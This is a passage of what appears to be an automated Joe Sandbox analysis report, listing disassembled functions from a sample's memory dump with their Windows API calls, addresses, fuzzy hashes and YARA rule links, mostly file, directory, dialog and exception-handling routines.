                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: be65f74f9a1642c5c777addd29ffd432f95887b4e023df1b0faafdaa0d88a603
                                                                              • Instruction ID: de9d1c1c04ae940226ea1fb627f9d13c9004496244c3f36df6b2004cdc97d7fc
                                                                              • Opcode Fuzzy Hash: be65f74f9a1642c5c777addd29ffd432f95887b4e023df1b0faafdaa0d88a603
                                                                              • Instruction Fuzzy Hash: 97A002D73A9745BC71087252AD0FC3F021CD4C1F21BB0951FF540E40C1B9C01D850435
                                                                              Function 00DD1A76 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetCurrentDirectoryW.KERNEL32(00000000,00DE1108,00000074,00DDE94A), ref: 00DD1A7C
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory
                                                                              • String ID:
                                                                              • API String ID: 1611563598-0
                                                                              • Opcode ID: 1552a5477a948ed8fa1697017fe2de4aac8d409dcd825307c323e969cb9c1a97
                                                                              • Instruction ID: 2204b3dccdbfa1fbac7919ea1c6b9fd9d04346e2b6854a02f0a2ca8203ca5f9c
                                                                              • Opcode Fuzzy Hash: 1552a5477a948ed8fa1697017fe2de4aac8d409dcd825307c323e969cb9c1a97
                                                                              • Instruction Fuzzy Hash: 71A02228300302838F202BB08F0FB0F300E8C03AE0B00C0883000C20A2CF28C0008030
                                                                              Function 00DCE730 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00DCE429,381977BE,?,?,00000000,00DF8950,000000FF,?,00DCA6F4,?,00000011), ref: 00DCE74C
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 5329390114a9b3700337ddaba2967d947c93aab6220f74663c4fdd3dbfff936a
                                                                              • Instruction ID: a87fc77745be687ede21f488a961e03127f0acd2b3ac8ec4903dda2f7618af16
                                                                              • Opcode Fuzzy Hash: 5329390114a9b3700337ddaba2967d947c93aab6220f74663c4fdd3dbfff936a
                                                                              • Instruction Fuzzy Hash: 1EF082B10427129EEB348A24C848B63B7E4AB11330F184B0ED0F2439E0D7A1A989DBA0

                                                                              Non-executed Functions

                                                                              Function 00DCA98F Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 436fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCA999
                                                                                • Part of subcall function 00DCA90A: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DCA926
                                                                                • Part of subcall function 00DCA90A: GetLastError.KERNEL32(?,?), ref: 00DCA96A
                                                                                • Part of subcall function 00DCA90A: CloseHandle.KERNEL32(?,?,?), ref: 00DCA979
                                                                                • Part of subcall function 00DCB1B7: __EH_prolog3.LIBCMT ref: 00DCB1BE
                                                                                • Part of subcall function 00DCF07C: __EH_prolog3_GS.LIBCMT ref: 00DCF083
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,00000160,\??\,00000000,00000000,?,00000108,00DCB352), ref: 00DCAC5D
                                                                                • Part of subcall function 00DCF2F2: __EH_prolog3_GS.LIBCMT ref: 00DCF2F9
                                                                                • Part of subcall function 00DCF2F2: GetFileAttributesW.KERNEL32(00000000,0000001C,00DCF2CA,?,00DCA3FB), ref: 00DCF306
                                                                                • Part of subcall function 00DCF2F2: GetFileAttributesW.KERNEL32(00000000), ref: 00DCF336
                                                                              • CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,00000160,\??\,00000000,00000000,?,00000108), ref: 00DCAC8C
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,00000160,\??\,00000000,00000000,?,00000108,00DCB352), ref: 00DCAE2A
                                                                                • Part of subcall function 00DCF5EF: __EH_prolog3_GS.LIBCMT ref: 00DCF5F6
                                                                                • Part of subcall function 00DCF5EF: RemoveDirectoryW.KERNEL32(00000000,0000001C,00DCAC1F,?,00000000,00000160,\??\,00000000,00000000,?,00000108,00DCB352,?,?,?,?), ref: 00DCF603
                                                                                • Part of subcall function 00DCF5EF: RemoveDirectoryW.KERNEL32(00000000,?,00000000,00000160,\??\,00000000,00000000,?,00000108,00DCB352,?,?,?,?,?), ref: 00DCF635
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000003,00000000,00000000,00000000,00000000), ref: 00DCAE85
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000160,\??\,00000000,00000000,?,00000108,00DCB352,?,?,?,?,?), ref: 00DCAE90
                                                                              • GetLastError.KERNEL32(?,?,00000000,00000160,\??\,00000000,00000000,?,00000108,00DCB352,?,?,?,?,?), ref: 00DCAEA5
                                                                              • RemoveDirectoryW.KERNEL32(?,00000009,?,00000000,00000160,\??\,00000000,00000000,?,00000108,00DCB352,?,?,?,?,?), ref: 00DCAEE9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FileH_prolog3_$CloseDirectoryHandleRemove$AttributesCreateErrorLast$ControlCurrentDeviceH_prolog3Process
                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                              • API String ID: 3794808894-3508440684
                                                                              • Opcode ID: 4764dbfa0fb2114fa357eace546fe83ec5cebb339ecd89b0d7f6b7558a2d9de3
                                                                              • Instruction ID: c3c8275fc43815b67f807cd359f05f4601d11f3ff304d08e97a70f95ddebf24c
                                                                              • Opcode Fuzzy Hash: 4764dbfa0fb2114fa357eace546fe83ec5cebb339ecd89b0d7f6b7558a2d9de3
                                                                              • Instruction Fuzzy Hash: 7A02B27490025E9EDB14EB78C952FEDB3B8EF15304F24819EE456A3282DB706E49CB71
                                                                              Function 00DDDB70 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 260windowfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DDDB7A
                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00DDDBF4
                                                                              • EndDialog.USER32(?,00000006), ref: 00DDDC07
                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00DDDC23
                                                                              • SetFocus.USER32(00000000,?,?,REPLACEFILEDLG,?,?,00000648), ref: 00DDDC2A
                                                                                • Part of subcall function 00DC2336: SetDlgItemTextW.USER32(000204C2,?,00000000), ref: 00DC2345
                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00DDDC92
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,REPLACEFILEDLG,?,?,00000648), ref: 00DDDCAB
                                                                                • Part of subcall function 00DDCC1D: FileTimeToSystemTime.KERNEL32(?,?,381977BE,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC65
                                                                                • Part of subcall function 00DDCC1D: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC74
                                                                                • Part of subcall function 00DDCC1D: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC82
                                                                                • Part of subcall function 00DDCC1D: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCC90
                                                                                • Part of subcall function 00DDCC1D: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCCAB
                                                                                • Part of subcall function 00DDCC1D: GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032,?,?,?,00000000,00DF9F98,000000FF), ref: 00DDCCCA
                                                                              • FindClose.KERNEL32(?,?,00000000,?,?,?,REPLACEFILEDLG,?,?,00000648), ref: 00DDDD52
                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00DDDDD5
                                                                                • Part of subcall function 00DDD350: GetNumberFormatW.KERNEL32(00000400,00000000,?,00E08884,?,00000032), ref: 00DDD3AF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Time$Item$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusH_prolog3_LocalNumberSpecificText
                                                                              • String ID: %s %s$REPLACEFILEDLG
                                                                              • API String ID: 103725086-439456425
                                                                              • Opcode ID: 361d00c86a10312a70be501393ff423f20c68ebe6344a9b83abefc09d41fde6a
                                                                              • Instruction ID: 1bd2488b1de9ee64f4f99e46bb1d5c1b064d24a8beb9a1cda94f915cdedd1602
                                                                              • Opcode Fuzzy Hash: 361d00c86a10312a70be501393ff423f20c68ebe6344a9b83abefc09d41fde6a
                                                                              • Instruction Fuzzy Hash: 0B91B075A00218AEDB24EB64CC56FFE777EEB55300F14809AB50AA72D2DA705F48CB31
                                                                              Function 00DCF9B3 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCF9BD
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000270,00DCF985,?,?,?,00DCA63D,?,?,00000000,?,00000000,000001A0,00DCB025,00000000), ref: 00DCF9DD
                                                                                • Part of subcall function 00DD1520: __EH_prolog3_GS.LIBCMT ref: 00DD1527
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00DCA63D,?,?,00000000,?,00000000,000001A0,00DCB025,00000000,STM), ref: 00DCFA18
                                                                              • GetLastError.KERNEL32(?,?,00DCA63D,?,?,00000000,?,00000000,000001A0,00DCB025,00000000,STM), ref: 00DCFA31
                                                                              • FindNextFileW.KERNEL32(?,?,00000270,00DCF985,?,?,?,00DCA63D,?,?,00000000,?,00000000,000001A0,00DCB025,00000000), ref: 00DCFA55
                                                                              • GetLastError.KERNEL32(?,?,00000270,00DCF985,?,?,?,00DCA63D,?,?,00000000,?,00000000,000001A0,00DCB025,00000000), ref: 00DCFA62
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$ErrorFirstH_prolog3_Last$Next
                                                                              • String ID:
                                                                              • API String ID: 1064375344-0
                                                                              • Opcode ID: 9f8b431dd68158d7ebd4e040f940dad9b510c4eb8bf484d09f7802b0388135de
                                                                              • Instruction ID: 0a68e661fe488d4772539ed736a92c332843dcd5605bc524878d500e76f7d1bf
                                                                              • Opcode Fuzzy Hash: 9f8b431dd68158d7ebd4e040f940dad9b510c4eb8bf484d09f7802b0388135de
                                                                              • Instruction Fuzzy Hash: 4D41513590461A9BCB14DF74C895BEDF775BF09320F5482AAE42AE3691DB30AA44CF70
                                                                              Function 00DF2B50 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f7d02a8585976d18e9b05b4497ae30263b16b7214ba80c757a27719df4add70
                                                                              • Instruction ID: 8f8436dc1e520ee35b17a30b8351dd80d83fe051f2e9255586e899cc403e9e94
                                                                              • Opcode Fuzzy Hash: 3f7d02a8585976d18e9b05b4497ae30263b16b7214ba80c757a27719df4add70
                                                                              • Instruction Fuzzy Hash: 09020C71E012199BDF14CFA9D9806BEBBF1FF48314F258269EA15E7341D731A9418BA0
                                                                              Function 00DE3559 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00DE3565
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00DE3631
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DE3651
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00DE365B
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                              • String ID:
                                                                              • API String ID: 254469556-0
                                                                              • Opcode ID: 6496077bf11e4a478799399630654cf87eba320b952498cd99a905de9d37eef9
                                                                              • Instruction ID: 538bb6cd321ec38b06251bf3f17ad20719e16bff8874af02937362e03f673ab3
                                                                              • Opcode Fuzzy Hash: 6496077bf11e4a478799399630654cf87eba320b952498cd99a905de9d37eef9
                                                                              • Instruction Fuzzy Hash: DF3118B5D053189BDB11EFA5D9897DCBBB8AF08304F1041AAE40DAB250EB719B85CF64
                                                                              Function 00DE1FA6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(80000000,00DE1EEB,0000001C,00DE20E0,00000000,?,?,?,?,?,?,?,00DE1EEB,00000004,00E08D60,00DE2170), ref: 00DE1FB7
                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00DE1EEB,00000004,00E08D60,00DE2170), ref: 00DE1FD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: InfoQuerySystemVirtual
                                                                              • String ID: D
                                                                              • API String ID: 401686933-2746444292
                                                                              • Opcode ID: bc34a9bf34a4ff322ff61502e6c43c1c847a4901f2ce7ea752b2a1017abd2bfc
                                                                              • Instruction ID: f06e88d1fb8dcf9f4b79526e6888aae41e5b84292f51691b18e440465c809a25
                                                                              • Opcode Fuzzy Hash: bc34a9bf34a4ff322ff61502e6c43c1c847a4901f2ce7ea752b2a1017abd2bfc
                                                                              • Instruction Fuzzy Hash: 1601A772A002096BDB24EF29DC05BEE7BADAFC4324F0CC125AD59DB255DB34D911C690
                                                                              Function 00DE7833 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00DE24EE), ref: 00DE792B
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00DE24EE), ref: 00DE7935
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00DE24EE), ref: 00DE7942
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: 163b4adffaf2414be86b7b52889d9cfe72de2f74327e9de29c0b74c4d217c7d3
                                                                              • Instruction ID: 64c4e25258efb6bf1cca2e0ad696814b07db3242b02c6e4f0f1c7afaf85038f4
                                                                              • Opcode Fuzzy Hash: 163b4adffaf2414be86b7b52889d9cfe72de2f74327e9de29c0b74c4d217c7d3
                                                                              • Instruction Fuzzy Hash: 7731B375901328ABCB61EF25DD8979CBBB8BF08310F5041EAE40CA7291E7709B858F64
                                                                              Function 00DCA149 Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,00DCA1B7,?,00000034,00DC9F3B,?,0000001C,00DD4DBD,00E09850,CryptUnprotectMemory failed,?,00DD4C55,00000000,?,?), ref: 00DCA14D
                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,00DCA1B7,?,00000034,00DC9F3B,?,0000001C,00DD4DBD), ref: 00DCA16E
                                                                              • LocalFree.KERNEL32(00000000,00000000,?,?,00DCA1B7,?,00000034,00DC9F3B,?,0000001C,00DD4DBD,00E09850,CryptUnprotectMemory failed,?,00DD4C55,00000000), ref: 00DCA186
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                              • String ID:
                                                                              • API String ID: 1365068426-0
                                                                              • Opcode ID: a9743c61db7b3a3917537b162f16dca0b0acae6454fb789c885e092eae316d35
                                                                              • Instruction ID: 2c2ee1eba4170f1eaba13d654478cfbc23b5bb739d7d8e72e958b186204c6b9c
                                                                              • Opcode Fuzzy Hash: a9743c61db7b3a3917537b162f16dca0b0acae6454fb789c885e092eae316d35
                                                                              • Instruction Fuzzy Hash: D2E03074600309BEEB059F60CD06FBF7779EB81794F18C019B50196150DB31DE01EA74
                                                                              Function 00DDD314 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00DDD337
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 6b75517a1ce017e85780b549962e16768cb623ff7f32d688ecddf8e33b68dc1a
                                                                              • Instruction ID: e866961cf1ff49ef52615278ef78a9d3996a8a8725bd704d30c230ce5e78139d
                                                                              • Opcode Fuzzy Hash: 6b75517a1ce017e85780b549962e16768cb623ff7f32d688ecddf8e33b68dc1a
                                                                              • Instruction Fuzzy Hash: 28E01234A0130DEFF710EB65DD56F79B3B8EB08704F4041A6EA05A72C5DA705E488A25
                                                                              Function 00DE36EC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00023700,00DE3145), ref: 00DE36F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: b7c0e6b6ed0208e823ccfee1eba61c3b850233928a28dc0aca2349db707f45fe
                                                                              • Instruction ID: 16a61191a65f0a4d30d271c9b9308ddf5e80cf95e67a22a1853a887346cb7c8a
                                                                              • Opcode Fuzzy Hash: b7c0e6b6ed0208e823ccfee1eba61c3b850233928a28dc0aca2349db707f45fe
                                                                              • Instruction Fuzzy Hash:
                                                                              Function 00DF1450 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: fa1062fe3ef53a27a03243346ca5fc636820780ca14343c6c18c2c20812840a9
                                                                              • Instruction ID: 3791f3f1a37dc17b7a4359eb52476527ae43897a795bcfb162485a3bb267f415
